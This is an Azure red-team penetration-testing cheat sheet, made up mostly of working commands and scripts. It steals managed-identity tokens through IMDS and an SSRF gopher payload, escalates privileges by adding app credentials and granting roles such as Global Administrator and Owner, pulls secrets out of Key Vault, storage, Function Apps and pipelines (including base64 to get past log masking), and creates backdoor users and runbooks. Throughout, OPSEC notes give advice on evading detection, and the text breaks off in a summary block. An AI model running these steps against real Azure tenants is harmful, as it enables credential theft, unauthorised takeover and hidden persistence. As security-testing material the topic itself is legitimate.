Cloud Pentesting (Azure)#
Azure Metadata Service & Privilege Escalation#
Azure VM Metadata Service (IMDS) Exploitation#
Querying the IMDS Endpoint:#
# Azure IMDS endpoint (no authentication required from within VM)
# Different from AWS - uses custom header, not token-based
# Get instance metadata
curl -H Metadata:true "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | jq .
# Get instance compute information
curl -H Metadata:true "http://169.254.169.254/metadata/instance/compute?api-version=2021-02-01" | jq .
# Extract useful information
curl -H Metadata:true "http://169.254.169.254/metadata/instance/compute?api-version=2021-02-01" | jq '{
vmId: .vmId,
subscriptionId: .subscriptionId,
resourceGroupName: .resourceGroupName,
location: .location,
name: .name
}'
# Get network information
curl -H Metadata:true "http://169.254.169.254/metadata/instance/network?api-version=2021-02-01" | jq .
# Get scheduled events (maintenance notifications)
curl -H Metadata:true "http://169.254.169.254/metadata/scheduledevents?api-version=2020-07-01" | jq .
# CRITICAL: Get managed identity access token
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" | jq .
# Get Microsoft Graph token (for Entra ID access)
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com/" | jq .
# Get Key Vault token
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net/" | jq .
# Get Storage token
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://storage.azure.com/" | jq .
# Get SQL Database token
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://database.windows.net/" | jq .
# For user-assigned managed identities (specify client ID)
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/&client_id=<client-id>" | jq .
# Extract token from response
TOKEN=$(curl -s -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" | jq -r .access_token)
# OPSEC: IMDS access doesn't require authentication
# The metadata queries themselves are not logged (use of the resulting tokens is)
# Managed identity tokens are typically valid for up to 24 hours
SSRF Exploitation for IMDS Access:#
# Azure IMDS via SSRF (simpler than AWS - only requires header injection)
# If you can control HTTP headers in SSRF
GET http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/
Header: Metadata: true
# If header injection not possible, look for proxy/redirect vulnerabilities
# Azure IMDS requires "Metadata: true" header - no way around it
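# If the SSRF sink supports the gopher:// scheme, the raw HTTP request (header included)
# can sometimes be smuggled instead; an illustrative payload, URL-encoded once:
gopher://169.254.169.254:80/_GET%20/metadata/instance%3Fapi-version%3D2021-02-01%20HTTP/1.1%0D%0AHost:%20169.254.169.254%0D%0AMetadata:%20true%0D%0A%0D%0A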
# URL encoding for header injection attempts
Metadata:%20true
# In HTTP parameter pollution scenarios
?Metadata=true&url=http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/
# OPSEC: SSRF to IMDS is common attack vector
# Azure's header requirement makes it slightly harder than AWS IMDSv1
Using Retrieved Managed Identity Tokens:#
# Test ARM token
curl -H "Authorization: Bearer $TOKEN" \
"https://management.azure.com/subscriptions?api-version=2020-01-01" | jq .
# Get current identity information
curl -H "Authorization: Bearer $TOKEN" \
"https://management.azure.com/providers/Microsoft.ManagedIdentity/identities?api-version=2018-11-30" | jq .
# List accessible subscriptions
curl -H "Authorization: Bearer $TOKEN" \
"https://management.azure.com/subscriptions?api-version=2020-01-01" | jq '.value[] | {subscriptionId, displayName}'
# Use the managed identity with Azure CLI (az login cannot consume a raw bearer token)
# From inside the VM:
az login --identity --allow-no-subscriptions
# For a user-assigned identity, specify its client ID
az login --identity --username <client-id> --allow-no-subscriptions
# Subsequent tokens are then issued via the logged-in identity
az account get-access-token
# Use with PowerShell
Connect-AzAccount -AccessToken $TOKEN -AccountId <managed-identity-client-id>
# Use Graph token
GRAPH_TOKEN=$(curl -s -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com/" | jq -r .access_token)
curl -H "Authorization: Bearer $GRAPH_TOKEN" \
"https://graph.microsoft.com/v1.0/me" | jq .
# OPSEC: Managed identities are service principals under the hood
# Actions are attributed to the identity rather than a named user, which complicates attribution
Decoding and Analyzing JWT Tokens:#
# Decode the JWT payload (format: header.payload.signature; segments are base64url-encoded)
echo $TOKEN | cut -d. -f2 | base64 -d 2>/dev/null | jq .
# Or inspect offline with a tool such as https://jwt.io/ (avoid pasting live tokens into third-party sites)
# Key JWT claims to examine:
# - oid: Object ID of the identity
# - tid: Tenant ID
# - aud: Audience (which service token is for)
# - exp: Expiration timestamp
# - iat: Issued at timestamp
# - appid: Application ID (for service principals)
# - roles: Role claims (permissions)
# Check token expiration
exp_timestamp=$(echo $TOKEN | cut -d. -f2 | base64 -d 2>/dev/null | jq -r .exp)
exp_date=$(date -d @$exp_timestamp 2>/dev/null || date -r $exp_timestamp 2>/dev/null)
echo "Token expires: $exp_date"
# OPSEC: Understanding token claims helps identify privilege level
App Service / Function App Metadata Access:#
# App Services also have access to managed identity tokens
# Same IMDS endpoint works from App Service environment
# Additionally, App Services have environment variables
# MSI_ENDPOINT and MSI_SECRET (older authentication method)
# Check for MSI environment variables
echo $MSI_ENDPOINT
echo $MSI_SECRET
# Use MSI endpoint (legacy method, still works)
curl "$MSI_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" \
-H "Secret: $MSI_SECRET" | jq .
# OPSEC: App Services often have elevated permissions
# Check both IMDS and MSI_ENDPOINT methods
Privilege Escalation Techniques#
1. Managed Identity Abuse (Most Common):#
# Scenario: You're on a VM/App Service with managed identity
# Get token and enumerate permissions
TOKEN=$(curl -s -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" | jq -r .access_token)
# Check what you can do - log in as the identity from the compromised resource
# (a raw access token cannot be fed to az login; use --identity, or call ARM directly with curl)
az login --identity --allow-no-subscriptions
# List role assignments for this identity
az role assignment list --assignee <managed-identity-object-id> --all
# Common escalation paths:
# - Contributor on subscription = full control over resources
# - Owner = can grant roles to others
# - User Access Administrator = can grant roles
# - Key Vault access = retrieve secrets, certificates
# If identity has Key Vault access, enumerate secrets
az keyvault list
az keyvault secret list --vault-name <vault-name>
az keyvault secret show --vault-name <vault-name> --name <secret-name>
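# To see exactly what the identity can do at a given scope, the ARM permissions endpoint can be
# queried with the raw token (subscription ID below is a placeholder)
curl -s -H "Authorization: Bearer $TOKEN" \
"https://management.azure.com/subscriptions/<subscription-id>/providers/Microsoft.Authorization/permissions?api-version=2022-04-01" | jq .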
# OPSEC: Managed identities are invisible to user-based CA policies
# High-privilege managed identities are common misconfigurations
2. Application Owner to Service Principal Credentials:#
# Scenario: You own an application registration
# Add credentials to the application's service principal
# List applications you own
Get-MgApplication -Filter "owners/any(o:o/id eq '<your-user-object-id>')"
# Or check directly
Get-MgApplicationOwner -ApplicationId <app-object-id>
# Add password credential (client secret)
$passwordCred = @{
DisplayName = "DevOps Deployment Key"
EndDateTime = (Get-Date).AddYears(2)
}
$newCred = Add-MgApplicationPassword -ApplicationId <app-object-id> -PasswordCredential $passwordCred
# Save the secret value (only shown once)
$clientSecret = $newCred.SecretText
Write-Host "Client Secret: $clientSecret"
# Add certificate credential (more stealthy)
$cert = New-SelfSignedCertificate -Subject "CN=AppAuth" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable -KeySpec Signature
# Use Update-MgApplication here: Add-MgApplicationKey requires proof-of-possession with an existing key,
# and the key value must be the raw certificate bytes (not a re-encoded base64 string)
Update-MgApplication -ApplicationId <app-object-id> -KeyCredentials @(
@{
Type = "AsymmetricX509Cert"
Usage = "Verify"
Key = $cert.RawData
}
)
# Authenticate with the new credentials
$tenantId = "<tenant-id>"
$appId = "<application-id>"
# Using client secret
az login --service-principal -u $appId -p $clientSecret --tenant $tenantId
# Using certificate
Connect-AzAccount -ServicePrincipal -ApplicationId $appId -Tenant $tenantId -CertificateThumbprint $cert.Thumbprint
# Check service principal's permissions
Get-MgServicePrincipal -Filter "appId eq '$appId'"
$sp = Get-MgServicePrincipal -Filter "appId eq '$appId'"
Get-MgServicePrincipalAppRoleAssignment -ServicePrincipalId $sp.Id
# OPSEC: Application owners can add credentials without additional privileges
# Certificate authentication generates less obvious audit logs than secrets
3. Service Principal with Application.ReadWrite.All:#
# Scenario: Service principal has Application.ReadWrite.All permission
# Can modify any application, including adding high-privilege permissions
# Create new application with privileged permissions
$app = New-MgApplication -DisplayName "InfrastructureAutomation" -Description "Infrastructure management tools"
# Add Microsoft Graph permissions
$graphResourceId = "00000003-0000-0000-c000-000000000000" # Microsoft Graph
# High-value permissions
$permissions = @(
@{
Id = "9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8" # RoleManagement.ReadWrite.Directory
Type = "Role"
},
@{
Id = "19dbc75e-c2e2-444c-a770-ec69d8559fc7" # Directory.ReadWrite.All
Type = "Role"
},
@{
Id = "62a82d76-70ea-41e2-9197-370581804d09" # Group.ReadWrite.All
Type = "Role"
}
)
Update-MgApplication -ApplicationId $app.Id -RequiredResourceAccess @{
ResourceAppId = $graphResourceId
ResourceAccess = $permissions
}
# Create service principal
New-MgServicePrincipal -AppId $app.AppId
# Grant admin consent (if you have Cloud Application Administrator role)
# This requires additional privileges but is the goal
# Manual step: Portal > Enterprise Apps > App > Permissions > Grant admin consent
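# Sketch: if your principal holds AppRoleAssignment.ReadWrite.All (or an eligible admin role),
# admin consent for an application permission can be granted by creating the app role assignment
# directly - reusing the Graph resource and role IDs from above
$graphSp = Get-MgServicePrincipal -Filter "appId eq '00000003-0000-0000-c000-000000000000'"
$mySp = Get-MgServicePrincipal -Filter "appId eq '$($app.AppId)'"
New-MgServicePrincipalAppRoleAssignment -ServicePrincipalId $mySp.Id `
-PrincipalId $mySp.Id -ResourceId $graphSp.Id `
-AppRoleId "19dbc75e-c2e2-444c-a770-ec69d8559fc7" # Directory.ReadWrite.All (listed above)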
# OPSEC: Application.ReadWrite.All is extremely powerful
# Can create applications with any permissions (though admin consent still needed)
4. Directory Role Assignment (If You Have Permissions):#
# Scenario: You have Privileged Role Administrator or similar
# Assign yourself or controlled identity to privileged roles
# Get available directory roles
Get-MgDirectoryRoleTemplate -All
# Activate role (if not already active)
$roleTemplate = Get-MgDirectoryRoleTemplate | Where-Object {$_.DisplayName -eq "Global Administrator"}
New-MgDirectoryRole -RoleTemplateId $roleTemplate.Id
# Assign user to role
$role = Get-MgDirectoryRole -Filter "displayName eq 'Global Administrator'"
$user = Get-MgUser -UserId "target-user@domain.com"
New-MgDirectoryRoleMemberByRef -DirectoryRoleId $role.Id -BodyParameter @{
"@odata.id" = "https://graph.microsoft.com/v1.0/users/$($user.Id)"
}
# Verify assignment
Get-MgDirectoryRoleMember -DirectoryRoleId $role.Id
# OPSEC: Highly logged action; use sparingly
# Consider assigning to less obvious roles first (Security Administrator, etc.)
5. Azure RBAC Privilege Escalation (Subscription Level):#
# Scenario: You have User Access Administrator or Owner role
# Grant yourself elevated roles on subscription/resource groups
# Grant Owner role to your user
az role assignment create \
--assignee "user@domain.com" \
--role "Owner" \
--scope "/subscriptions/<subscription-id>"
# Or grant to managed identity
az role assignment create \
--assignee <managed-identity-object-id> \
--role "Contributor" \
--scope "/subscriptions/<subscription-id>/resourceGroups/<rg-name>"
# Create custom role with specific permissions
az role definition create --role-definition '{
"Name": "Custom Backup Administrator",
"Description": "Can manage backups and recovery",
"Actions": [
"*"
],
"NotActions": [],
"AssignableScopes": [
"/subscriptions/<subscription-id>"
]
}'
# Assign custom role
az role assignment create \
--assignee "user@domain.com" \
--role "Custom Backup Administrator" \
--scope "/subscriptions/<subscription-id>"
# OPSEC: RBAC changes logged in Activity Log
# Custom roles with broad permissions may go unnoticed longer than built-in roles
6. Automation Account RunAs Account Abuse:#
# Scenario: You have access to Automation Account
# RunAs accounts (now deprecated but still in use) have service principal credentials
# Get automation account
$automationAccount = Get-AzAutomationAccount -ResourceGroupName "rg-name" -Name "account-name"
# Check for RunAs account (legacy)
Get-AzAutomationConnection -ResourceGroupName "rg-name" -AutomationAccountName "account-name"
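# Sketch: from inside a runbook, the legacy RunAs assets can be used directly
# (asset names below are the defaults; adjust to whatever the connection listing above returns)
$conn = Get-AutomationConnection -Name "AzureRunAsConnection"
Connect-AzAccount -ServicePrincipal -Tenant $conn.TenantId `
-ApplicationId $conn.ApplicationId -CertificateThumbprint $conn.CertificateThumbprint
Get-AzRoleAssignment -ServicePrincipalName $conn.ApplicationId # see what the RunAs SP can reach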
# Create new credential in automation account
New-AzAutomationCredential -ResourceGroupName "rg-name" `
-AutomationAccountName "account-name" `
-Name "BackupCreds" `
-Value (Get-Credential)
# Create runbook that uses credential
$runbookScript = @'
param($credentialName)
$credential = Get-AutomationPSCredential -Name $credentialName
Connect-AzAccount -Credential $credential
Get-AzSubscription
'@
New-AzAutomationRunbook -ResourceGroupName "rg-name" `
-AutomationAccountName "account-name" `
-Name "CredentialTest" `
-Type PowerShell `
-Description "Test credential"
# Save the script so it can be imported
$runbookScript | Out-File -FilePath "runbook.ps1"
Import-AzAutomationRunbook -ResourceGroupName "rg-name" `
-AutomationAccountName "account-name" `
-Name "CredentialTest" `
-Path "runbook.ps1" `
-Type PowerShell `
-Force
Publish-AzAutomationRunbook -ResourceGroupName "rg-name" `
-AutomationAccountName "account-name" `
-Name "CredentialTest"
Start-AzAutomationRunbook -ResourceGroupName "rg-name" `
-AutomationAccountName "account-name" `
-Name "CredentialTest"
# OPSEC: Automation accounts often have broad permissions
# Runbooks can be scheduled or triggered on-demand
7. Key Vault Certificate-Based Authentication:#
# Scenario: You have access to Key Vault with certificate
# Extract certificate and use for authentication
# Download certificate
az keyvault certificate download \
--vault-name "vault-name" \
--name "cert-name" \
--file "cert.pem"
# Download private key (if accessible)
az keyvault secret show \
--vault-name "vault-name" \
--name "cert-name" \
--query value \
--output tsv | base64 -d > cert.pfx
# Convert PFX to PEM (if needed)
openssl pkcs12 -in cert.pfx -out cert-with-key.pem -nodes
# Extract thumbprint
openssl x509 -in cert.pem -noout -fingerprint -sha1 | sed 's/://g' | cut -d= -f2
# Authenticate with certificate
az login --service-principal \
--username <application-id> \
--tenant <tenant-id> \
--certificate cert-with-key.pem
# OPSEC: Certificate authentication is common for service principals
# Certificates may have long validity periods (years)
8. Storage Account Key Escalation:#
# Scenario: You have storage account access
# Storage accounts may contain deployment credentials, connection strings
# List storage accounts you can access
az storage account list --output table
# Get storage account keys
az storage account keys list \
--account-name "storage-name" \
--resource-group "rg-name"
# Use keys to access storage
az storage container list \
--account-name "storage-name" \
--account-key "<key>"
# Search for credentials in blobs
az storage blob list \
--container-name "deployments" \
--account-name "storage-name" \
--account-key "<key>" \
--query "[?contains(name, 'publish') || contains(name, 'cred') || contains(name, '.env')]"
# Download interesting blobs
az storage blob download \
--container-name "container" \
--name "app-settings.json" \
--account-name "storage-name" \
--account-key "<key>" \
--file "./app-settings.json"
# Check for ARM templates with secrets
az storage blob download \
--container-name "templates" \
--name "deployment.json" \
--account-name "storage-name" \
--account-key "<key>"
# OPSEC: Storage accounts are data goldmines
# Look for: .env files, publish profiles, ARM templates, backup files
9. Logic App / Function App Environment Variable Extraction:#
# Scenario: You have access to Logic App or Function App
# Extract connection strings and credentials from configuration
# Get Function App settings
az functionapp config appsettings list \
--name "function-name" \
--resource-group "rg-name"
# Look for sensitive keys
az functionapp config appsettings list \
--name "function-name" \
--resource-group "rg-name" \
--query "[?contains(name, 'SECRET') || contains(name, 'KEY') || contains(name, 'PASSWORD') || contains(name, 'CONNECTION')]"
# Get Logic App connections
az logic workflow show \
--resource-group "rg-name" \
--name "logic-app-name"
# OPSEC: Serverless apps often have hardcoded credentials
# Connection strings may contain database passwords, API keys
10. DevOps Pipeline Secrets Extraction:#
# Scenario: You have access to Azure DevOps
# Extract secrets from pipelines, variable groups
# List Azure DevOps organizations (requires Azure DevOps CLI)
az devops project list --organization "https://dev.azure.com/org-name"
# List pipelines
az pipelines list --organization "https://dev.azure.com/org-name" --project "project-name"
# Get pipeline variables
az pipelines variable list \
--organization "https://dev.azure.com/org-name" \
--project "project-name" \
--pipeline-id <pipeline-id>
# List variable groups
az pipelines variable-group list \
--organization "https://dev.azure.com/org-name" \
--project "project-name"
# Get variable group values
az pipelines variable-group show \
--organization "https://dev.azure.com/org-name" \
--project "project-name" \
--group-id <group-id>
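# NOTE: values of variables marked "secret" are not returned by the commands above.
# A common approach is to add a pipeline step that re-encodes the value so log masking
# misses it (illustrative YAML step; the variable name is an assumption):
steps:
- script: echo "$(DB_PASSWORD)" | base64
  displayName: 'Diagnostics'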
# OPSEC: DevOps pipelines often have production credentials
# Service connections may have contributor/owner permissions
Azure - Automated Tools & Persistence#
Automated Reconnaissance Tools#
ROADtools (Azure AD/Entra ID Reconnaissance):#
# Installation
pip3 install roadrecon
# Or from source
git clone https://github.com/dirkjanm/ROADtools.git
cd ROADtools
pip3 install .
# PHASE 1: Authentication and data gathering
# Method 1: Interactive authentication
roadrecon auth --username user@domain.com --password 'password'
# Method 2: Access token authentication
roadrecon auth --access-token 'eyJ0eXAiOiJKV1Q...'
# Method 3: Refresh token (longer-lived)
roadrecon auth --refresh-token 'eyJ0eXAiOiJKV1Q...'
# Method 4: Device code flow (for MFA-protected accounts)
roadrecon auth --device-code
# PHASE 2: Gather data from Entra ID
roadrecon gather
# This collects:
# - All users, groups, service principals
# - Applications and OAuth grants
# - Directory roles and assignments
# - Devices and Conditional Access policies
# - Administrative units
# - Domain information
# Gather with specific token scopes
roadrecon gather --tokens-stdin
# PHASE 3: GUI analysis (BloodHound-style interface)
roadrecon gui
# Web interface opens at http://localhost:5000
# Visualize attack paths, privilege relationships
# PHASE 4: Plugin system for custom queries
roadrecon plugin -h
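# Example: the built-in "policies" plugin parses the gathered Conditional Access policies into an HTML report
roadrecon plugin policies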
# Export data for offline analysis
roadrecon dump
# OPSEC: ROADtools queries Graph API extensively
# Use slowly or during business hours
# Token-based auth leaves minimal footprint vs. interactive login
AzureHound (BloodHound for Azure):#
# Installation (part of BloodHound CE now)
# Download from: https://github.com/BloodHoundAD/AzureHound/releases
chmod +x azurehound
./azurehound -h
# Authentication methods
# Method 1: Interactive device code
./azurehound -r "https://graph.microsoft.com" -t "<tenant-id>" -d
# Method 2: Service principal
./azurehound -r "https://graph.microsoft.com" -t "<tenant-id>" \
-a "<application-id>" -s "<client-secret>"
# Method 3: Certificate-based
./azurehound -r "https://graph.microsoft.com" -t "<tenant-id>" \
-a "<application-id>" -c "<certificate.pem>"
# Method 4: JWT token
./azurehound -r "https://graph.microsoft.com" -j "<jwt-token>"
# List available collectors
./azurehound list
# Run all collectors
./azurehound -r "https://graph.microsoft.com" -t "<tenant-id>" -d list -o output.json
# Run specific collectors
./azurehound -r "https://graph.microsoft.com" -t "<tenant-id>" -d \
--collectors "groups,users,servicePrincipals,roles,managementGroups"
# Output formats
./azurehound -r "https://graph.microsoft.com" -t "<tenant-id>" -d -o azure-data.json
# Import into BloodHound
# 1. Start BloodHound CE
# 2. Upload azure-data.json
# 3. Run Cypher queries for attack paths
# Useful BloodHound queries for Azure:
# - Find paths to Global Admin
# - Identify application owners
# - Map service principal permissions
# - Find key vault access paths
# OPSEC: AzureHound generates many Graph API calls
# Use during business hours to blend in
# Consider rate limiting with --delay flag
Stormspotter (Azure Red Team Tool):#
# Installation
git clone https://github.com/Azure/Stormspotter.git
cd Stormspotter
# Using Docker (recommended)
docker-compose up
# Backend setup
cd backend
pip3 install -r requirements.txt
# Frontend setup
cd ../frontend
npm install
# Authentication
# Stormspotter uses device code flow
# Run data collection
python3 stormspotter/ssrun.py
# This collects:
# - Subscription and resource data
# - RBAC assignments
# - Network topology
# - Storage and database configurations
# - Key vaults and secrets metadata
# View in web interface
# Navigate to http://localhost:3000
# Generate attack graph
# Visualizes relationships between Azure resources
# Identifies privilege escalation paths
# Export data
python3 stormspotter/ssexport.py --output azure-export.json
# OPSEC: Comprehensive collection tool
# Focuses on Azure resources more than Entra ID
# Complements ROADtools/AzureHound
PowerZure (Azure Exploitation Framework):#
# Installation
Install-Module -Name PowerZure -Force
# Or from GitHub
git clone https://github.com/hausec/PowerZure.git
Import-Module .\PowerZure.psd1
# Import module
Import-Module PowerZure
# Authenticate
# Uses existing Az PowerShell session
Connect-AzAccount
# Alternative: Use access token
$token = "eyJ0eXAiOiJKV1Q..."
# PowerZure will use existing session
# RECONNAISSANCE COMMANDS:
# Get current context
Get-AzureTarget
# Enumerate subscriptions and permissions
Get-AzureTargets
# Find interesting resources
Get-AzureRunAsAccounts # Automation account credentials
Get-AzureKeyVaultContent # Key Vault secrets
Get-AzureStorageContent # Storage account data
Get-AzureSQLDB # SQL databases
Get-AzureVMs # Virtual machines
# Find role assignments
Get-AzureRoleMembers -Role "Owner"
Get-AzureRoleMembers -Role "Contributor"
# EXPLOITATION COMMANDS:
# Create backdoor user (if you have permissions)
New-Backdoor -Username "svc-backup" -Password "P@ssw0rd123!"
# Execute commands on VMs (if you have access)
Execute-Command -VM "vm-name" -ResourceGroup "rg-name" -Command "whoami"
# Create runbook for persistence
New-Backdoor -Runbook
# Dump Key Vault secrets
Get-AzureKeyVaultContent -All
# LATERAL MOVEMENT:
# Find trusts between subscriptions
Get-AzureTargets
# Enumerate management groups
Get-AzManagementGroup
# OPSEC FEATURES:
# Check for monitoring
Get-AzureSecurityCenter
# List alert rules
Get-AlertRules
# OPSEC: PowerZure is older but still functional
# Some cmdlets may need updates for latest Azure changes
# Good for quick wins and enumeration
MicroBurst (Azure Security Assessment):#
# Installation
git clone https://github.com/NetSPI/MicroBurst.git
Import-Module .\MicroBurst.psm1
# Or install from PowerShell Gallery
Install-Module -Name MicroBurst -Force
# Import module
Import-Module MicroBurst
# ENUMERATION MODULES:
# Enumerate Azure subdomains (external recon)
Invoke-EnumerateAzureSubDomains -Base "company"
# Finds: company.onmicrosoft.com, company.sharepoint.com, etc.
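# Manual spot-check of a few candidate names (the module automates this across many service
# suffixes); hostnames below are illustrative
"company.onmicrosoft.com","company.sharepoint.com","company.blob.core.windows.net" | ForEach-Object {
try { [System.Net.Dns]::GetHostEntry($_) | Out-Null; "$_ : resolves" } catch { "$_ : not found" }
}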
# Enumerate storage account names
Invoke-EnumerateAzureBlobs -Base "company"
# Brute-forces common storage account naming patterns
# Test for public blob containers
Invoke-EnumerateAzureBlobs -Base "company" -Verbose
# Enumerate publicly accessible storage containers
Get-AzureStorageBlobs
# Once authenticated:
# Harvest credentials across the subscription
Get-AzPasswords
# Dumps Key Vault secrets, App Service configuration strings, Automation account credentials, and more
# Enumerate Azure AD users (from inside)
Get-AzureADUsers
# Get service principal information
Get-AzureDomainInfo
# Find application passwords/secrets metadata
Get-MsolDomainInfo
# VM credential extraction
Get-AzureVMDisk
# Analyzes VM disks for credentials
# PRIVILEGE ESCALATION:
# Execute command on VM via Custom Script Extension
Invoke-AzureRmVMBulkCMD -VM "vm-name" -ResourceGroup "rg-name" -Command "whoami"
# Create backdoor via Automation Account
New-AzureBackdoor
# OPSEC NOTES:
# External enumeration (subdomains, storage) is passive
# Internal enumeration generates normal Graph/ARM API calls
# VM command execution may trigger alerts
ScoutSuite (Multi-Cloud, includes Azure):#
# Installation
pip install scoutsuite
# Azure scan with browser authentication
scout azure
# Use specific authentication method
scout azure --cli # Uses Azure CLI session
scout azure --user-account # Interactive browser login
scout azure --service-principal --tenant-id <tenant> --client-id <client> --client-secret <secret>
# Scan specific subscriptions
scout azure --subscriptions <subscription-id>
# Scan with custom ruleset
scout azure --ruleset-name custom-rules.json
# Output options
scout azure --report-dir ./azure-report
scout azure --no-browser # Don't open browser automatically
# Scan results include:
# - IAM misconfigurations
# - Network security issues
# - Storage account public access
# - Key Vault security
# - SQL database configurations
# - VM security settings
# - Entra ID (Azure AD) issues
# Generate HTML report with findings
# Categorized by severity and compliance frameworks
# OPSEC: Read-only assessment tool
# Comprehensive but noisy (many API calls)
# Use with --max-workers 1 to throttle requests
Custom Enumeration Script:#
# Azure Red Team Enumeration Script
# Save as: Azure-RedTeam-Enum.ps1
param(
[switch]$StealthMode,
[switch]$FullEnum,
[string]$OutputDir = "./azure-enum-results"
)
# Create output directory
New-Item -ItemType Directory -Force -Path $OutputDir | Out-Null
Write-Host "[*] Starting Azure Red Team Enumeration" -ForegroundColor Cyan
# Get current context
Write-Host "[+] Checking authentication context..." -ForegroundColor Green
$context = Get-AzContext
if (-not $context) {
Write-Host "[-] Not authenticated. Run Connect-AzAccount first." -ForegroundColor Red
exit
}
$context | Export-Clixml "$OutputDir/context.xml"
# Subscription enumeration
Write-Host "[+] Enumerating subscriptions..." -ForegroundColor Green
$subscriptions = Get-AzSubscription
$subscriptions | Export-Csv "$OutputDir/subscriptions.csv" -NoTypeInformation
# For each subscription
foreach ($sub in $subscriptions) {
Set-AzContext -Subscription $sub.Id | Out-Null
Write-Host "[+] Processing subscription: $($sub.Name)" -ForegroundColor Yellow
# RBAC assignments
Write-Host " [+] Collecting RBAC assignments..." -ForegroundColor Green
$roleAssignments = Get-AzRoleAssignment
$roleAssignments | Export-Csv "$OutputDir/$($sub.Name)-rbac.csv" -NoTypeInformation
# Resource groups
Write-Host " [+] Collecting resource groups..." -ForegroundColor Green
$rgs = Get-AzResourceGroup
$rgs | Export-Csv "$OutputDir/$($sub.Name)-resourcegroups.csv" -NoTypeInformation
# Virtual Machines
Write-Host " [+] Collecting VMs..." -ForegroundColor Green
$vms = Get-AzVM -Status
$vms | Select-Object Name, ResourceGroupName, Location, PowerState, @{N="OsType";E={$_.StorageProfile.OsDisk.OsType}} |
Export-Csv "$OutputDir/$($sub.Name)-vms.csv" -NoTypeInformation
# Storage Accounts
Write-Host " [+] Collecting storage accounts..." -ForegroundColor Green
$storageAccounts = Get-AzStorageAccount
$storageAccounts | Export-Csv "$OutputDir/$($sub.Name)-storage.csv" -NoTypeInformation
# Key Vaults
Write-Host " [+] Collecting Key Vaults..." -ForegroundColor Green
$keyVaults = Get-AzKeyVault
$keyVaults | Export-Csv "$OutputDir/$($sub.Name)-keyvaults.csv" -NoTypeInformation
# SQL Servers
Write-Host " [+] Collecting SQL Servers..." -ForegroundColor Green
$sqlServers = Get-AzSqlServer
$sqlServers | Export-Csv "$OutputDir/$($sub.Name)-sql.csv" -NoTypeInformation
# Web Apps
Write-Host " [+] Collecting Web Apps..." -ForegroundColor Green
$webApps = Get-AzWebApp
$webApps | Export-Csv "$OutputDir/$($sub.Name)-webapps.csv" -NoTypeInformation
if (-not $StealthMode) {
# NSGs (more detailed)
Write-Host " [+] Collecting NSG rules..." -ForegroundColor Green
$nsgs = Get-AzNetworkSecurityGroup
$nsgRules = @()
foreach ($nsg in $nsgs) {
foreach ($rule in $nsg.SecurityRules) {
$nsgRules += [PSCustomObject]@{
NSG = $nsg.Name
RuleName = $rule.Name
Priority = $rule.Priority
Direction = $rule.Direction
Access = $rule.Access
Protocol = $rule.Protocol
SourceAddress = ($rule.SourceAddressPrefix -join ', ')
DestinationPort = ($rule.DestinationPortRange -join ', ')
}
}
}
$nsgRules | Export-Csv "$OutputDir/$($sub.Name)-nsg-rules.csv" -NoTypeInformation
}
if ($StealthMode) {
Start-Sleep -Seconds 5 # Rate limiting
}
}
# Entra ID enumeration (requires Microsoft.Graph)
if (Get-Module -ListAvailable -Name Microsoft.Graph) {
Write-Host "[+] Enumerating Entra ID..." -ForegroundColor Green
try {
Connect-MgGraph -Scopes "Directory.Read.All" -NoWelcome -ErrorAction Stop
# Users
Write-Host " [+] Collecting users..." -ForegroundColor Green
$users = Get-MgUser -All
$users | Select-Object DisplayName, UserPrincipalName, AccountEnabled, UserType |
Export-Csv "$OutputDir/entra-users.csv" -NoTypeInformation
# Groups
Write-Host " [+] Collecting groups..." -ForegroundColor Green
$groups = Get-MgGroup -All
$groups | Export-Csv "$OutputDir/entra-groups.csv" -NoTypeInformation
# Directory Roles
Write-Host " [+] Collecting directory roles..." -ForegroundColor Green
$roles = Get-MgDirectoryRole -All
$roleMembers = @()
foreach ($role in $roles) {
$members = Get-MgDirectoryRoleMember -DirectoryRoleId $role.Id
foreach ($member in $members) {
$roleMembers += [PSCustomObject]@{
Role = $role.DisplayName
MemberUPN = $member.AdditionalProperties.userPrincipalName
MemberType = $member.AdditionalProperties.'@odata.type'
}
}
}
$roleMembers | Export-Csv "$OutputDir/entra-role-members.csv" -NoTypeInformation
# Applications
Write-Host " [+] Collecting applications..." -ForegroundColor Green
$apps = Get-MgApplication -All
$apps | Select-Object DisplayName, AppId, CreatedDateTime |
Export-Csv "$OutputDir/entra-applications.csv" -NoTypeInformation
# Service Principals
Write-Host " [+] Collecting service principals..." -ForegroundColor Green
$sps = Get-MgServicePrincipal -All
$sps | Select-Object DisplayName, AppId, ServicePrincipalType |
Export-Csv "$OutputDir/entra-service-principals.csv" -NoTypeInformation
} catch {
Write-Host "[-] Error enumerating Entra ID: $_" -ForegroundColor Red
}
}
Write-Host "[*] Enumeration complete! Results saved to: $OutputDir" -ForegroundColor Cyan
Write-Host "[*] Review the CSV files for findings" -ForegroundColor Cyan
# Generate summary report
$summary = @"
Azure Red Team Enumeration Summary
===================================
Date: $(Get-Date)
Subscriptions: $($subscriptions.Count)
Output Directory: $OutputDir
Files Generated:
- subscriptions.csv
- *-rbac.csv (per subscription)
- *-resourcegroups.csv
- *-vms.csv
- *-storage.csv
- *-keyvaults.csv
- *-sql.csv
- *-webapps.csv
- entra-*.csv (if Graph access available)
Next Steps:
1. Review RBAC assignments for privilege escalation
